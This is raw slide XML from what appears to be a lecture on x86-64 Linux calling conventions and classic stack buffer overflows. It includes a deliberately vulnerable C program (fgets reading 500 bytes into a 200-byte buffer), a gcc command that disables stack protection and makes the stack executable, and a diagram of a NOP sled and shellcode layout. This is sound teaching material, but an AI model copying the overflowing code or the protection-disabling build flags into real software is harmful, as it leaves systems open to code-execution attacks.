          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875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32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Linux Calling Convention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01540C-A49E-8047-8D70-45176DCB6096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295081" y="1825404"/>
            <a:ext cx="3656246" cy="42032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stdlib.h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&gt;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stdio.h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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p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int callee(int a, int b, int c) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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   return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a+b+c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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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int main() {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   int temp = callee(1,2,3);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  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printf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("number: %d\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n",temp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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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BD5FAF-D28E-7D15-106B-D0F3B0C81320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316625" y="1512420"/>
            <a:ext cx="6265003" cy="473824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sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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 sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" err="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    edx,0x3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    esi,0x2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    edi,0x1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call   0x1149 &lt;callee&gt;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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,[rip+0xe6c]        # 0x2004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mov    eax,0x0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call   0x1050 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ret   </a:t>
            </a:r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FC442-6843-8DAE-33B5-E74865255094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670538" y="4446395"/>
            <a:ext cx="2461846" cy="3433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4B91AD-1586-1823-CD2C-12766997CA51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351395" y="2612570"/>
            <a:ext cx="2018045" cy="3433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60C6A832-23F4-67F0-47E6-1E5C53F856E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5969804" y="2644343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0F9D5A4-4298-B513-2B46-273B199DA333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8901191" y="2538933"/>
            <a:ext cx="2253701" cy="4922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onsolas"/>
              </a:rPr>
              <a:t>3rd argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2558464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Linux Calling Convention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01540C-A49E-8047-8D70-45176DCB6096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295081" y="1825404"/>
            <a:ext cx="3656246" cy="42032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#include &lt;</a:t>
            </a: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stdlib.h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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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stdio.h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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p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int callee(int a, int b, int c) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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   return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a+b+c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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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int main() {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   int temp = callee(1,2,3);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  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printf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("number: %d\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n",temp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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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BD5FAF-D28E-7D15-106B-D0F3B0C81320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316625" y="1512420"/>
            <a:ext cx="6265003" cy="473824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sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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 sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" err="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    edx,0x3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    esi,0x2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    edi,0x1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call   0x1149 &lt;callee&gt;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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,[rip+0xe6c]        # 0x2004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mov    eax,0x0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call   0x1050 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ret   </a:t>
            </a:r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FC442-6843-8DAE-33B5-E74865255094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670538" y="4446395"/>
            <a:ext cx="2461846" cy="3433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4B91AD-1586-1823-CD2C-12766997CA51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6393263" y="2964262"/>
            <a:ext cx="2018045" cy="3433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76CD4A-19B6-1C02-DBE0-B28D51D544AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8901191" y="2890625"/>
            <a:ext cx="2253701" cy="4922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onsolas"/>
              </a:rPr>
              <a:t>2nd argument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68E071F3-4EF7-A02F-6B75-DA995F382FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6011672" y="2996035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28758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Linux Calling Convention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01540C-A49E-8047-8D70-45176DCB6096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295081" y="1825404"/>
            <a:ext cx="3656246" cy="42032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#include &lt;</a:t>
            </a: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stdlib.h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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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stdio.h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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p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int callee(int a, int b, int c) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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   return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a+b+c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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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int main() {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   int temp = callee(1,2,3);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  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printf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("number: %d\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n",temp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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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BD5FAF-D28E-7D15-106B-D0F3B0C81320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316625" y="1512420"/>
            <a:ext cx="6265003" cy="473824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sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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 sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" err="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    edx,0x3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    esi,0x2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    edi,0x1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call   0x1149 &lt;callee&gt;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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,[rip+0xe6c]        # 0x2004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mov    eax,0x0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call   0x1050 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ret   </a:t>
            </a:r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FC442-6843-8DAE-33B5-E74865255094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670538" y="4446395"/>
            <a:ext cx="2461846" cy="3433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4B91AD-1586-1823-CD2C-12766997CA51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6376516" y="3341075"/>
            <a:ext cx="2018045" cy="3433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161AE670-3F0A-E7EB-5000-248D6B332D31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6011672" y="3372848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3BF8D9-67F1-C889-0E31-2E991CD6E182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8926312" y="3267438"/>
            <a:ext cx="2253701" cy="4922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onsolas"/>
              </a:rPr>
              <a:t>1st argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3608807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Traditional Buffer Overflow Exploit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E257486-9F0E-DABC-8453-C030F86588BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383029" y="1622259"/>
            <a:ext cx="5431473" cy="42120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/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#include &lt;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stdlib.h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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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#include &lt;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stdio.h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&gt;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#include &lt;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string.h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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/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int main(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>argc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, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>argv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[], char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>enp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[]) {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    char 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buf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[200];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    puts("Enter your message:");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    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printf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("&gt; ");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    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fflush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stdout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);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    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fgets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(buf,500,stdin);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    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printf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("You said: %s\n",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buf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);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    return 0;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7FBD35-DECA-2D1E-6CC3-2E553CF214D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4388435" y="3288798"/>
            <a:ext cx="2066956" cy="1522021"/>
            <a:chOff x="7566742" y="3523225"/>
            <a:chExt cx="1876323" cy="142567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76EDDC4-0AD3-DC05-1620-847798735C6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7566742" y="3523225"/>
              <a:ext cx="1237227" cy="36051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6A67F30-1F97-2487-6657-927D8C075BFC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7566742" y="4612966"/>
              <a:ext cx="1876323" cy="33593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E9F030A-F1B0-7C41-6AAC-58115AEB37FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046369" y="5832435"/>
            <a:ext cx="21030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onsolas"/>
              </a:rPr>
              <a:t>bof_demo.c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3AD6F-8CE2-591C-3210-EA241F8FA327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953277" y="1901890"/>
            <a:ext cx="238606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62626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -Wall -O0 -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-omit-frame-pointer -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-deprecated-declarations -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-format-security -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>norelro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-stack-protector -no-pie -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bof_demo.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial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3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Traditional Buffer Overflow Exploit (cont.)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110FEE0-EE97-0F6A-8B7C-8A4CADC5E5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0011094"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8857779" y="2042580"/>
          <a:ext cx="2630109" cy="3785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6308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6308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Garamond"/>
                        </a:rPr>
                        <a:t>Pointer to no-op sled</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/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329210"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6308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Saved EBP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/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00225"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630855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Garamond"/>
                        </a:rPr>
                        <a:t>Shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/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67826"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6308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Garamond"/>
                        </a:rPr>
                        <a:t>No-op sled</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/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360958"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6308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350060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FDBF86-703C-09B8-32B9-F2503D086D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295401" y="1832103"/>
            <a:ext cx="3620449" cy="3989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SzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Develop Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
